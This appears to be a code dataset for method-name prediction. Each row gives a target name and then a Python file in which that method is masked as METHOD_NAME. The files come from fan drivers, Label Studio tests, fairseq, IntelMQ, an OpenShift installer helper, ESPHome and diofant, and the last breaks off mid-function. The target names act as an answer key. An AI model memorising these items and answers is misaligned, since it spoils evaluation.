PSU_FRU_MAPPING = { 1: 1, 2: 2 }
def __init__(self, fantray_index=1, fan_index=1, psu_fan=False,
dependency=None):
FanBase.__init__(self)
self.is_psu_fan = psu_fan
if not self.is_psu_fan:
# API index is starting from 0, DellEMC platform index is
# starting from 1
self.fantrayindex = fantray_index + 1
self.fanindex = fan_index + 1
if (self.fanindex == 1):
self.max_speed_offset = FAN1_MAX_SPEED_OFFSET
else:
self.max_speed_offset = FAN2_MAX_SPEED_OFFSET
self.fan_direction_offset = FAN_DIRECTION_OFFSET
self.index = (self.fantrayindex - 1) * 2 + self.fanindex
self.prsnt_sensor = IpmiSensor(self.FAN_SENSOR_MAPPING[self.index]["Prsnt"],
is_discrete=True)
self.state_sensor = IpmiSensor(self.FAN_SENSOR_MAPPING[self.index]["State"],
is_discrete=True)
self.speed_sensor = IpmiSensor(self.FAN_SENSOR_MAPPING[self.index]["Speed"])
self.fru = IpmiFru(self.FAN_FRU_MAPPING[self.fantrayindex])
else:
self.dependency = dependency
self.fanindex = fan_index
self.state_sensor = IpmiSensor(self.PSU_FAN_SENSOR_MAPPING[self.fanindex]["State"],
is_discrete=True)
self.speed_sensor = IpmiSensor(self.PSU_FAN_SENSOR_MAPPING[self.fanindex]["Speed"])
self.fru = IpmiFru(self.PSU_FRU_MAPPING[self.fanindex])
self.max_speed_offset = PSU_FAN_MAX_SPEED_OFFSET
self.fan_direction_offset = PSU_FAN_DIRECTION_OFFSET
self.max_speed = 0
def get_name(self):
"""
Retrieves the name of the device
Returns:
String: The name of the device
"""
if self.is_psu_fan:
return "PSU{} Fan".format(self.fanindex)
else:
return "FanTray{}-Fan{}".format(self.fantrayindex, self.fanindex)
def get_model(self):
"""
Retrieves the part number of the FAN
Returns:
String: Part number of FAN
"""
if self.is_psu_fan:
return 'NA'
else:
return self.fru.get_board_part_number()
def get_serial(self):
"""
Retrieves the serial number of the FAN
Returns:
String: Serial number of FAN
"""
if self.is_psu_fan:
return 'NA'
else:
return self.fru.get_board_serial()
def METHOD_NAME(self):
"""
Retrieves the presence of the FAN
Returns:
bool: True if fan is present, False if not
"""
presence = False
if self.is_psu_fan:
return self.dependency.METHOD_NAME()
else:
is_valid, state = self.prsnt_sensor.get_reading()
if is_valid:
if (state & 0b1):
presence = True
return presence
def get_status(self):
"""
Retrieves the operational status of the FAN
Returns:
bool: True if FAN is operating properly, False if not
"""
status = False
is_valid, state = self.state_sensor.get_reading()
if is_valid:
if not state > 1:
status = True
return status
def get_direction(self):
"""
Retrieves the fan airfow direction
Returns:
A string, either FAN_DIRECTION_INTAKE or FAN_DIRECTION_EXHAUST
depending on fan direction
Notes:
In DellEMC platforms,
- Forward/Exhaust : Air flows from Port side to Fan side.
- Reverse/Intake : Air flows from Fan side to Port side.
"""
direction = [self.FAN_DIRECTION_EXHAUST, self.FAN_DIRECTION_INTAKE]
fan_status = self.METHOD_NAME()
if not fan_status:
return 'NA'
is_valid, fan_direction = self.fru.get_fru_data(self.fan_direction_offset)
if is_valid and fan_direction[0] < len(direction):
return direction[fan_direction[0]]
else:
return 'NA'
def get_speed(self):
"""
Retrieves the speed of the fan
Returns:
int: percentage of the max fan speed
"""
if self.max_speed == 0:
is_valid, max_speed = self.fru.get_fru_data(self.max_speed_offset,2)
if not is_valid:
return 0
            # the FRU stores the max speed as a 16-bit little-endian value
            self.max_speed = max_speed[1] << 8 | max_speed[0]
is_valid, fan_speed = self.speed_sensor.get_reading()
if not is_valid or self.max_speed == 0:
speed = 0
else:
speed = (100 * fan_speed)//self.max_speed
return speed
def get_speed_rpm(self):
"""
        Retrieves the speed of the fan in RPM
        Returns:
            int: Fan speed in RPM as reported by the speed sensor
"""
fan_speed = 0
is_valid, fan_speed = self.speed_sensor.get_reading()
return fan_speed | null |
test views tasks api | """This file and its contents are licensed under the Apache License 2.0. Please see the included NOTICE for copyright information and LICENSE for a copy of the license.
"""
import json
import pytest
from projects.models import Project
from ..utils import make_annotation, make_prediction, make_task, project_id # noqa
@pytest.mark.django_db
def METHOD_NAME(business_client, project_id):
# create
payload = dict(project=project_id, data={"test": 1})
response = business_client.post(
"/api/dm/views/",
data=json.dumps(payload),
content_type="application/json",
)
assert response.status_code == 201, response.content
view_id = response.json()["id"]
# no tasks
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
assert response.json()["total"] == 0
assert len(response.json()["tasks"]) == 0
project = Project.objects.get(pk=project_id)
task_data = {"text": "bbb"}
task_id = make_task({"data": task_data}, project).id
annotation_result = {"from_name": "my_class", "to_name": "text", "type": "choices", "value": {"choices": ["pos"]}}
make_annotation({"result": [annotation_result]}, task_id)
make_annotation(
{
"result": [annotation_result],
"was_cancelled": True,
},
task_id,
)
prediction_result = {"from_name": "my_class", "to_name": "text", "type": "choices", "value": {"choices": ["pos"]}}
make_prediction(
{
"result": [prediction_result],
},
task_id,
)
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
response_data = response.json()
assert response_data["total"] == 1
assert len(response_data["tasks"]) == 1
assert response_data["tasks"][0]["id"] == task_id
assert response_data["tasks"][0]["data"] == task_data
assert response_data["tasks"][0]["total_annotations"] == 1
assert "annotations_results" in response_data["tasks"][0]
assert response_data["tasks"][0]["cancelled_annotations"] == 1
assert response_data["tasks"][0]["total_predictions"] == 1
assert "predictions_results" in response_data["tasks"][0]
num_anno1 = response_data["tasks"][0]['annotations'][0]['id']
num_anno2 = response_data["tasks"][0]['annotations'][1]['id']
num_pred = response_data["tasks"][0]['predictions'][0]['id']
# delete annotations and check counters
business_client.delete(f"/api/annotations/{num_anno1}")
business_client.delete(f"/api/annotations/{num_anno2}")
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
response_data = response.json()
assert response_data["tasks"][0]["cancelled_annotations"] == 0
assert response_data["tasks"][0]["total_annotations"] == 0
# delete prediction and check counters
business_client.delete(f"/api/predictions/{num_pred}")
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
assert response.status_code == 200, response.content
response_data = response.json()
assert response_data["tasks"][0]["cancelled_annotations"] == 0
assert response_data["tasks"][0]["total_annotations"] == 0
assert response_data["tasks"][0]["total_predictions"] == 0
@pytest.mark.parametrize(
"tasks_count, annotations_count, predictions_count",
[
[0, 0, 0],
[1, 0, 0],
[1, 1, 1],
[2, 2, 2],
],
)
@pytest.mark.django_db
def test_views_total_counters(tasks_count, annotations_count, predictions_count, business_client, project_id):
# create
payload = dict(project=project_id, data={"test": 1})
response = business_client.post(
"/api/dm/views/",
data=json.dumps(payload),
content_type="application/json",
)
assert response.status_code == 201, response.content
view_id = response.json()["id"]
project = Project.objects.get(pk=project_id)
for _ in range(0, tasks_count):
task_id = make_task({"data": {}}, project).id
print('TASK_ID: %s' % task_id)
for _ in range(0, annotations_count):
make_annotation({"result": []}, task_id)
for _ in range(0, predictions_count):
make_prediction({"result": []}, task_id)
response = business_client.get(f"/api/tasks?fields=all&view={view_id}")
response_data = response.json()
assert response_data["total"] == tasks_count, response_data
assert response_data["total_annotations"] == tasks_count * annotations_count, response_data
assert response_data["total_predictions"] == tasks_count * predictions_count, response_data | null |
set task ids | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
from typing import Dict, List, Optional
from pathlib import Path
import torch.nn as nn
from torch import Tensor
from fairseq import checkpoint_utils
from fairseq.models import register_model, register_model_architecture
from fairseq.utils import safe_hasattr
from fairseq.models.speech_to_text.s2t_transformer import (
S2TTransformerModel,
S2TTransformerEncoder,
TransformerDecoderScriptable
)
from fairseq.models.speech_to_text.s2t_transformer import base_architecture as s2t_base_architecture
from ..modules.attn_head_selector import AttnHeadSelector
from ..modules.head_selection_transformer_layer import HeadSelectionTransformerEncoderLayer
from .head_selection_transformer import HeadSelectionTransformerDecoder
logger = logging.getLogger(__name__)
@register_model("head_selection_s2t_transformer")
class HeadSelectionS2TTransformerModel(S2TTransformerModel):
"""
Head selection implemented in S2TTransformer
"""
def __init__(self, encoder, decoder):
super().__init__(encoder, decoder)
@staticmethod
def add_args(parser):
S2TTransformerModel.add_args(parser)
# encoder head selection
parser.add_argument(
"--encoder-attn-head-select",
action="store_true",
default=False,
help="encoder head selection"
)
parser.add_argument(
"--total-encoder-attention-heads",
type=int,
help="total number of encoder attention heads"
)
# decoder self attention selection
parser.add_argument(
"--decoder-self-attn-head-select",
action="store_true",
default=False,
help="decoder self-attention head selection"
)
# decoder-encoder attention selection
parser.add_argument(
"--dec-enc-attn-head-select",
action="store_true",
default=False,
help="decoder-encoder attention head selection"
)
parser.add_argument(
"--total-decoder-attention-heads",
type=int,
help="total number of decoder attention heads"
)
# selection strategy
parser.add_argument(
"--attn-head-select-strategy",
type=str,
help="attention head selection strategy, subset or group"
)
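        # Illustrative CLI usage of the options defined above (values are examples only):
        #   --encoder-attn-head-select --total-encoder-attention-heads 8 \
        #   --attn-head-select-strategy group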
@classmethod
def build_encoder(cls, args):
if safe_hasattr(args, "encoder_attn_head_select") and args.encoder_attn_head_select:
encoder = HeadSelectionS2TTransformerEncoder(args)
else:
encoder = S2TTransformerEncoder(args)
pretraining_path = getattr(args, "load_pretrained_encoder_from", None)
if pretraining_path is not None:
if not Path(pretraining_path).exists():
logger.warning(
f"skipped pretraining because {pretraining_path} does not exist"
)
else:
encoder = checkpoint_utils.load_pretrained_component_from_model(
component=encoder, checkpoint=pretraining_path
)
logger.info(f"loaded pretrained encoder from: {pretraining_path}")
return encoder
@classmethod
def build_decoder(cls, args, task, embed_tokens):
if (safe_hasattr(args, "decoder_self_attn_head_select") and args.decoder_self_attn_head_select) or (safe_hasattr(args, "dec_enc_attn_head_select") and args.dec_enc_attn_head_select):
return HeadSelectionTransformerDecoderScriptable(args, task.target_dictionary, embed_tokens)
else:
return TransformerDecoderScriptable(args, task.target_dictionary, embed_tokens)
class HeadSelectionS2TTransformerEncoder(S2TTransformerEncoder):
def __init__(self, args):
super().__init__(args)
self.attn_head_selector = AttnHeadSelector(
args.encoder_tasks,
args.encoder_layers,
args.total_encoder_attention_heads,
args.encoder_attention_heads,
args.attn_head_select_strategy,
)
self.task_ids = None
self.transformer_layers = nn.ModuleList([
HeadSelectionTransformerEncoderLayer(args, layer_idx, attn_head_selector=self.attn_head_selector) for layer_idx in range(args.encoder_layers)
])
def METHOD_NAME(self, task_ids):
self.task_ids = task_ids
def _forward(self, src_tokens, src_lengths, return_all_hiddens=False):
self.attn_head_selector.head_select(self.task_ids)
return super()._forward(src_tokens, src_lengths, return_all_hiddens)
class HeadSelectionTransformerDecoderScriptable(HeadSelectionTransformerDecoder):
def extract_features(
self,
prev_output_tokens,
encoder_out: Optional[Dict[str, List[Tensor]]] = None,
incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
full_context_alignment: bool = False,
alignment_layer: Optional[int] = None,
alignment_heads: Optional[int] = None,
):
# call scriptable method from parent class
x, _ = self.extract_features_scriptable(
prev_output_tokens,
encoder_out,
incremental_state,
full_context_alignment,
alignment_layer,
alignment_heads,
)
return x, None
@register_model_architecture(model_name="head_selection_s2t_transformer", arch_name="head_selection_s2t_transformer")
def base_architecture(args):
s2t_base_architecture(args)
args.encoder_attn_head_select = getattr(args, "encoder_attn_head_select", False)
args.decoder_self_attn_head_select = getattr(args, "decoder_self_attn_head_select", False)
args.dec_enc_attn_head_select = getattr(args, "dec_enc_attn_head_select", False)
args.total_encoder_attention_heads = getattr(args, "total_encoder_attention_heads", 8)
args.total_decoder_attention_heads = getattr(args, "total_decoder_attention_heads", 8)
args.attn_head_select_strategy = getattr(args, "attn_head_select_strategy", "group")
@register_model_architecture("head_selection_s2t_transformer", "head_selection_s2t_transformer_s")
def head_selection_s2t_transformer_s(args):
args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 256)
args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 256 * 8)
args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 4)
args.decoder_attention_heads = getattr(args, "decoder_attention_heads", 4)
args.dropout = getattr(args, "dropout", 0.1)
base_architecture(args) | null |
update database | # SPDX-FileCopyrightText: 2015 National CyberSecurity Center
#
# SPDX-License-Identifier: AGPL-3.0-or-later
# -*- coding: utf-8 -*-
"""
This product includes GeoLite2 data created by MaxMind, available from
<a href="http://www.maxmind.com">http://www.maxmind.com</a>.
"""
import io
import sys
import pathlib
import requests
import tarfile
from intelmq.lib.bot import ExpertBot
from intelmq.lib.exceptions import MissingDependencyError
from intelmq.lib.utils import get_bots_settings, create_request_session
from intelmq.bin.intelmqctl import IntelMQController
try:
import geoip2.database
except ImportError:
geoip2 = None
class GeoIPExpertBot(ExpertBot):
"""Add geolocation information from a local MaxMind database to events (country, city, longitude, latitude)"""
database: str = "/opt/intelmq/var/lib/bots/maxmind_geoip/GeoLite2-City.mmdb" # TODO: should be pathlib.Path
license_key: str = "<insert Maxmind license key>"
overwrite: bool = False
use_registered: bool = False
autoupdate_cached_database: bool = True # Activate/deactivate update-database functionality
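    # Illustrative runtime parameters for this bot (example values only; the
    # keys mirror the attributes above):
    #   parameters:
    #     database: /opt/intelmq/var/lib/bots/maxmind_geoip/GeoLite2-City.mmdb
    #     license_key: "<your MaxMind license key>"
    #     overwrite: false
    #     use_registered: false
    #     autoupdate_cached_database: true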
def init(self):
if geoip2 is None:
raise MissingDependencyError("geoip2")
try:
self.database = geoip2.database.Reader(self.database)
except OSError:
self.logger.exception("GeoIP Database does not exist or could not "
"be accessed in %r.",
self.database)
self.logger.error("Read 'bots/experts/geoip/README' and follow the"
" procedure.")
self.stop()
self.registered = self.use_registered
def process(self):
event = self.receive_message()
for key in ["source.%s", "destination.%s"]:
geo_key = key % "geolocation.%s"
if key % "ip" not in event:
continue
ip = event.get(key % "ip")
try:
info = self.database.city(ip)
if self.registered:
if info.registered_country.iso_code:
event.add(geo_key % "cc", info.registered_country.iso_code,
overwrite=self.overwrite)
else:
if info.country.iso_code:
event.add(geo_key % "cc", info.country.iso_code,
overwrite=self.overwrite)
if info.location.latitude:
event.add(geo_key % "latitude", info.location.latitude,
overwrite=self.overwrite)
if info.location.longitude:
event.add(geo_key % "longitude", info.location.longitude,
overwrite=self.overwrite)
if info.city.name:
event.add(geo_key % "city", info.city.name,
overwrite=self.overwrite)
except geoip2.errors.AddressNotFoundError:
pass
self.send_message(event)
self.acknowledge_message()
@classmethod
def run(cls, parsed_args=None):
if not parsed_args:
parsed_args = cls._create_argparser().parse_args()
if parsed_args.METHOD_NAME:
cls.METHOD_NAME(verbose=parsed_args.verbose)
else:
super().run(parsed_args=parsed_args)
@classmethod
def _create_argparser(cls):
argparser = super()._create_argparser()
argparser.add_argument("--update-database", action='store_true', help='downloads latest database data')
argparser.add_argument("--verbose", action='store_true', help='be verbose')
return argparser
@classmethod
def METHOD_NAME(cls, verbose=False):
bots = {}
license_key = None
runtime_conf = get_bots_settings()
try:
for bot in runtime_conf:
if runtime_conf[bot]["module"] == __name__ and runtime_conf[bot]['parameters'].get('autoupdate_cached_database', True):
license_key = runtime_conf[bot]["parameters"]["license_key"]
bots[bot] = runtime_conf[bot]["parameters"]["database"]
except KeyError as e:
error = f"Database update failed. Your configuration of {bot} is missing key {e}."
if str(e) == "'license_key'":
error += "\n"
error += "Since December 30, 2019 you need to register for a free license key to access GeoLite2 database.\n"
error += "https://blog.maxmind.com/2019/12/18/significant-changes-to-accessing-and-using-geolite2-databases/"
sys.exit(error)
else:
sys.exit(error)
if not bots:
if verbose:
print(f"Database update skipped. No bots of type {__name__} present in runtime configuration or database update disabled with parameter 'autoupdate_cached_database'.")
sys.exit(0)
# we only need to import now, if there are no maxmind_geoip bots, this dependency does not need to be installed
try:
import maxminddb
except ImportError:
raise MissingDependencyError('maxminddb',
additional_text="Package maxminddb should be present because it "
"is a dependency for the required geoip2 package.")
try:
if verbose:
print("Downloading the latest database update...")
session = create_request_session()
response = session.get("https://download.maxmind.com/app/geoip_download",
params={
"license_key": license_key,
"edition_id": "GeoLite2-City",
"suffix": "tar.gz"
})
except requests.exceptions.RequestException as e:
sys.exit(f"Database update failed. Connection Error: {e}")
if response.status_code == 401:
sys.exit("Database update failed. Your license key is invalid.")
if response.status_code != 200:
sys.exit("Database update failed. Server responded: {}.\n"
"URL: {}".format(response.status_code, response.url))
database_data = None
try:
with tarfile.open(fileobj=io.BytesIO(response.content), mode='r:gz') as archive:
for member in archive.getmembers():
if "GeoLite2-City.mmdb" in member.name:
database_data = maxminddb.open_database(database=archive.extractfile(member),
mode=maxminddb.MODE_FD)
break
except maxminddb.InvalidDatabaseError:
sys.exit("Database update failed. Database file invalid.")
if not database_data:
sys.exit("Database update failed. Could not locate file 'GeoLite2-City.mmbd' in the downloaded archive.")
for database_path in set(bots.values()):
database_dir = pathlib.Path(database_path).parent
database_dir.mkdir(parents=True, exist_ok=True)
with open(database_path, "wb") as database:
database.write(database_data._buffer)
if verbose:
print("Database updated. Reloading affected bots.")
ctl = IntelMQController()
for bot in bots.keys():
ctl.bot_reload(bot)
BOT = GeoIPExpertBot | null |
update existing | import json
import subprocess
import uuid
from typing import Any
import waiting
from junit_report import JunitTestCase
import consts
from assisted_test_infra.test_infra import BaseInfraEnvConfig, utils
from assisted_test_infra.test_infra.helper_classes.base_cluster import BaseCluster
from assisted_test_infra.test_infra.helper_classes.config.base_day2_cluster_config import BaseDay2ClusterConfig
from assisted_test_infra.test_infra.helper_classes.nodes import Nodes
from assisted_test_infra.test_infra.utils.waiting import wait_till_all_hosts_are_in_status
from service_client import log
from service_client.assisted_service_api import InventoryClient
class Day2Cluster(BaseCluster):
_config: BaseDay2ClusterConfig
def __init__(
self,
api_client: InventoryClient,
config: BaseDay2ClusterConfig,
infra_env_config: BaseInfraEnvConfig,
day2_nodes: Nodes,
):
self._kubeconfig_path = utils.get_kubeconfig_path(config.day1_cluster.name)
self.name = config.cluster_name.get()
super().__init__(api_client, config, infra_env_config, day2_nodes)
def _create(self) -> str:
openshift_cluster_id = str(uuid.uuid4())
params = {
"openshift_version": self._config.openshift_version,
"api_vip_dnsname": self._config.day1_api_vip_dnsname,
}
cluster = self.api_client.create_day2_cluster(self.name, openshift_cluster_id, **params)
self._config.cluster_id = cluster.id
return cluster.id
def METHOD_NAME(self) -> str:
raise NotImplementedError("Creating Day2Cluster object from an existing cluster is not implemented.")
def prepare_nodes(self, is_static_ip: bool = False, **kwargs):
"""Prepare the day2 worker nodes. When this method finishes, the hosts are in 'known' status."""
self.set_pull_secret(self._config.pull_secret)
self.set_cluster_proxy()
self.config_etc_hosts(self._config.day1_cluster_details.api_vip, self._config.day1_api_vip_dnsname)
# create the infraenv with specified day2 CPU architecture
self.generate_and_download_infra_env(
iso_download_path=self._config.iso_download_path,
iso_image_type=self._config.iso_image_type,
cpu_architecture=self._config.day2_cpu_architecture,
)
# spawn VMs
super(Day2Cluster, self).prepare_nodes(is_static_ip=self._config.day1_cluster._infra_env_config.is_static_ip)
self.nodes.wait_for_networking()
self.set_hostnames_and_roles()
# wait for host to be known
wait_till_all_hosts_are_in_status(
client=self.api_client,
cluster_id=self._config.cluster_id,
nodes_count=self._config.day2_workers_count + self._config.day2_masters_count,
statuses=[consts.NodesStatus.KNOWN],
interval=30,
)
def set_cluster_proxy(self):
"""
Set cluster proxy - copy proxy configuration from another (e.g. day 1) cluster,
or allow setting/overriding it via command arguments
"""
if self._config.proxy:
http_proxy = self._config.proxy.http_proxy
https_proxy = self._config.proxy.https_proxy
no_proxy = self._config.proxy.no_proxy
self.api_client.set_cluster_proxy(self.id, http_proxy, https_proxy, no_proxy)
@staticmethod
def config_etc_hosts(api_vip: str, api_vip_dnsname: str):
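        # Ensures /etc/hosts maps the day1 API VIP to its DNS name, e.g.
        # "192.168.127.100 api.day1-cluster.example.com" (illustrative values).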
with open("/etc/hosts", "r") as f:
hosts_lines = f.readlines()
for i, line in enumerate(hosts_lines):
if api_vip_dnsname in line:
hosts_lines[i] = api_vip + " " + api_vip_dnsname + "\n"
break
else:
hosts_lines.append(api_vip + " " + api_vip_dnsname + "\n")
with open("/etc/hosts", "w") as f:
f.writelines(hosts_lines)
@JunitTestCase()
def start_install_and_wait_for_installed(self):
ocp_ready_nodes = self.get_ocp_cluster_ready_nodes_num()
self._install_day2_cluster()
# post installation nodes day2 nodes rebooted
self.nodes.wait_till_nodes_are_ssh_ready()
self.wait_nodes_to_be_in_ocp(ocp_ready_nodes)
def wait_nodes_to_be_in_ocp(self, ocp_ready_nodes):
def wait_nodes_join_ocp_cluster(num_orig_nodes: int, num_new_nodes: int) -> bool:
self.approve_nodes_on_ocp_cluster()
return self.get_ocp_cluster_ready_nodes_num() == num_orig_nodes + num_new_nodes
log.info("Waiting until installed nodes has actually been added to the OCP cluster")
waiting.wait(
lambda: wait_nodes_join_ocp_cluster(
ocp_ready_nodes, self._config.day2_workers_count + self._config.day2_masters_count
),
timeout_seconds=consts.NODES_REGISTERED_TIMEOUT,
sleep_seconds=30,
waiting_for="Day2 nodes to be added to OCP cluster",
expected_exceptions=Exception,
)
log.info(
f"{self._config.day2_workers_count} worker and"
f" {self._config.day2_masters_count} master nodes were successfully added to OCP cluster"
)
def approve_nodes_on_ocp_cluster(self):
csrs = self.get_ocp_cluster_csrs(self._kubeconfig_path)
for csr in csrs:
if not csr["status"]:
csr_name = csr["metadata"]["name"]
subprocess.check_output(
f"oc --kubeconfig={self._kubeconfig_path} adm certificate approve {csr_name}",
shell=True,
)
log.info("CSR %s for node %s has been approved", csr_name, csr["spec"]["username"])
@staticmethod
def get_ocp_cluster_csrs(kubeconfig: Any) -> Any:
res = subprocess.check_output(f"oc --kubeconfig={kubeconfig} get csr --output=json", shell=True)
return json.loads(res)["items"]
def _install_day2_cluster(self):
# Start day2 nodes installation
log.info(f"Start installing all known nodes in the cluster {self.id}")
hosts = self.api_client.get_cluster_hosts(self.id)
for host in hosts:
if host["status"] == "known":
self.api_client.install_day2_host(self._infra_env_config.infra_env_id, host["id"])
log.info(
f"Waiting until all nodes of cluster {self.id} have been installed (reached " "added-to-existing-cluster)",
)
wait_till_all_hosts_are_in_status(
client=self.api_client,
cluster_id=self.id,
nodes_count=self._config.day2_workers_count + self._config.day2_masters_count,
statuses=[consts.NodesStatus.DAY2_INSTALLED],
interval=30,
)
def get_ocp_cluster_ready_nodes_num(self) -> int:
nodes = self.get_ocp_cluster_nodes(self._kubeconfig_path)
return len([node for node in nodes if self.is_ocp_node_ready(node["status"])])
@staticmethod
def get_ocp_cluster_nodes(kubeconfig: str):
res = subprocess.check_output(f"oc --kubeconfig={kubeconfig} get nodes --output=json", shell=True)
return json.loads(res)["items"]
@staticmethod
def is_ocp_node_ready(node_status: any) -> bool:
if not node_status:
return False
for condition in node_status["conditions"]:
if condition["status"] == "True" and condition["type"] == "Ready":
return True
return False | null |
validate | from esphome import pins
import esphome.config_validation as cv
import esphome.codegen as cg
from esphome.const import (
CONF_DOMAIN,
CONF_ID,
CONF_MANUAL_IP,
CONF_STATIC_IP,
CONF_TYPE,
CONF_USE_ADDRESS,
CONF_GATEWAY,
CONF_SUBNET,
CONF_DNS1,
CONF_DNS2,
)
from esphome.core import CORE, coroutine_with_priority
from esphome.components.network import IPAddress
CONFLICTS_WITH = ["wifi"]
DEPENDENCIES = ["esp32"]
AUTO_LOAD = ["network"]
ethernet_ns = cg.esphome_ns.namespace("ethernet")
CONF_PHY_ADDR = "phy_addr"
CONF_MDC_PIN = "mdc_pin"
CONF_MDIO_PIN = "mdio_pin"
CONF_CLK_MODE = "clk_mode"
CONF_POWER_PIN = "power_pin"
EthernetType = ethernet_ns.enum("EthernetType")
ETHERNET_TYPES = {
"LAN8720": EthernetType.ETHERNET_TYPE_LAN8720,
"RTL8201": EthernetType.ETHERNET_TYPE_RTL8201,
"DP83848": EthernetType.ETHERNET_TYPE_DP83848,
"IP101": EthernetType.ETHERNET_TYPE_IP101,
"JL1101": EthernetType.ETHERNET_TYPE_JL1101,
"KSZ8081": EthernetType.ETHERNET_TYPE_KSZ8081,
"KSZ8081RNA": EthernetType.ETHERNET_TYPE_KSZ8081RNA,
}
emac_rmii_clock_mode_t = cg.global_ns.enum("emac_rmii_clock_mode_t")
emac_rmii_clock_gpio_t = cg.global_ns.enum("emac_rmii_clock_gpio_t")
CLK_MODES = {
"GPIO0_IN": (
emac_rmii_clock_mode_t.EMAC_CLK_EXT_IN,
emac_rmii_clock_gpio_t.EMAC_CLK_IN_GPIO,
),
"GPIO0_OUT": (
emac_rmii_clock_mode_t.EMAC_CLK_OUT,
emac_rmii_clock_gpio_t.EMAC_APPL_CLK_OUT_GPIO,
),
"GPIO16_OUT": (
emac_rmii_clock_mode_t.EMAC_CLK_OUT,
emac_rmii_clock_gpio_t.EMAC_CLK_OUT_GPIO,
),
"GPIO17_OUT": (
emac_rmii_clock_mode_t.EMAC_CLK_OUT,
emac_rmii_clock_gpio_t.EMAC_CLK_OUT_180_GPIO,
),
}
MANUAL_IP_SCHEMA = cv.Schema(
{
cv.Required(CONF_STATIC_IP): cv.ipv4,
cv.Required(CONF_GATEWAY): cv.ipv4,
cv.Required(CONF_SUBNET): cv.ipv4,
cv.Optional(CONF_DNS1, default="0.0.0.0"): cv.ipv4,
cv.Optional(CONF_DNS2, default="0.0.0.0"): cv.ipv4,
}
)
EthernetComponent = ethernet_ns.class_("EthernetComponent", cg.Component)
ManualIP = ethernet_ns.struct("ManualIP")
def METHOD_NAME(config):
if CONF_USE_ADDRESS not in config:
if CONF_MANUAL_IP in config:
use_address = str(config[CONF_MANUAL_IP][CONF_STATIC_IP])
else:
use_address = CORE.name + config[CONF_DOMAIN]
config[CONF_USE_ADDRESS] = use_address
return config
CONFIG_SCHEMA = cv.All(
cv.Schema(
{
cv.GenerateID(): cv.declare_id(EthernetComponent),
cv.Required(CONF_TYPE): cv.enum(ETHERNET_TYPES, upper=True),
cv.Required(CONF_MDC_PIN): pins.internal_gpio_output_pin_number,
cv.Required(CONF_MDIO_PIN): pins.internal_gpio_output_pin_number,
cv.Optional(CONF_CLK_MODE, default="GPIO0_IN"): cv.enum(
CLK_MODES, upper=True, space="_"
),
cv.Optional(CONF_PHY_ADDR, default=0): cv.int_range(min=0, max=31),
cv.Optional(CONF_POWER_PIN): pins.internal_gpio_output_pin_number,
cv.Optional(CONF_MANUAL_IP): MANUAL_IP_SCHEMA,
cv.Optional(CONF_DOMAIN, default=".local"): cv.domain_name,
cv.Optional(CONF_USE_ADDRESS): cv.string_strict,
cv.Optional("enable_mdns"): cv.invalid(
"This option has been removed. Please use the [disabled] option under the "
"new mdns component instead."
),
}
).extend(cv.COMPONENT_SCHEMA),
METHOD_NAME,
)
def manual_ip(config):
return cg.StructInitializer(
ManualIP,
("static_ip", IPAddress(*config[CONF_STATIC_IP].args)),
("gateway", IPAddress(*config[CONF_GATEWAY].args)),
("subnet", IPAddress(*config[CONF_SUBNET].args)),
("dns1", IPAddress(*config[CONF_DNS1].args)),
("dns2", IPAddress(*config[CONF_DNS2].args)),
)
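# Illustrative YAML accepted by CONFIG_SCHEMA above (pin numbers are examples only):
#   ethernet:
#     type: LAN8720
#     mdc_pin: 23
#     mdio_pin: 18
#     clk_mode: GPIO0_IN
#     phy_addr: 0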
@coroutine_with_priority(60.0)
async def to_code(config):
var = cg.new_Pvariable(config[CONF_ID])
await cg.register_component(var, config)
cg.add(var.set_phy_addr(config[CONF_PHY_ADDR]))
cg.add(var.set_mdc_pin(config[CONF_MDC_PIN]))
cg.add(var.set_mdio_pin(config[CONF_MDIO_PIN]))
cg.add(var.set_type(config[CONF_TYPE]))
cg.add(var.set_clk_mode(*CLK_MODES[config[CONF_CLK_MODE]]))
cg.add(var.set_use_address(config[CONF_USE_ADDRESS]))
if CONF_POWER_PIN in config:
cg.add(var.set_power_pin(config[CONF_POWER_PIN]))
if CONF_MANUAL_IP in config:
cg.add(var.set_manual_ip(manual_ip(config[CONF_MANUAL_IP])))
cg.add_define("USE_ETHERNET")
if CORE.using_arduino:
cg.add_library("WiFi", None) | null |
test immutable creation | import pytest
from diofant import (Equality, ImmutableMatrix, ImmutableSparseMatrix, Matrix,
SparseMatrix, Unequality, eye, false, sympify, true,
zeros)
from diofant.abc import x, y
__all__ = ()
IM = ImmutableMatrix([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
ieye = ImmutableMatrix(eye(3))
def METHOD_NAME():
assert IM.shape == (3, 3)
assert IM[1, 2] == 6
assert IM[2, 2] == 9
def test_immutability():
with pytest.raises(TypeError):
IM[2, 2] = 5
ISM = SparseMatrix(IM).as_immutable()
with pytest.raises(TypeError):
ISM[2, 2] = 5
def test_slicing():
assert IM[1, :] == ImmutableMatrix([[4, 5, 6]])
assert IM[:2, :2] == ImmutableMatrix([[1, 2], [4, 5]])
def test_subs():
A = ImmutableMatrix([[1, 2], [3, 4]])
B = ImmutableMatrix([[1, 2], [x, 4]])
C = ImmutableMatrix([[-x, x*y], [-(x + y), y**2]])
assert B.subs({x: 3}) == A
assert (x*B).subs({x: 3}) == 3*A
assert (x*eye(2) + B).subs({x: 3}) == 3*eye(2) + A
assert C.subs({x: -1, y: -2}) == A
assert C.subs({x: y - 1, y: x - 1}, simultaneous=True) == \
ImmutableMatrix([[1 - y, (x - 1)*(y - 1)], [2 - x - y, (x - 1)**2]])
def test_as_immutable():
X = Matrix([[1, 2], [3, 4]])
assert sympify(X) == X.as_immutable() == ImmutableMatrix([[1, 2], [3, 4]])
X = SparseMatrix(5, 5, {})
assert sympify(X) == X.as_immutable() == ImmutableSparseMatrix(
[[0 for i in range(5)] for i in range(5)])
def test_function_return_types():
# Lets ensure that decompositions of immutable matrices remain immutable
# I.e. do MatrixBase methods return the correct class?
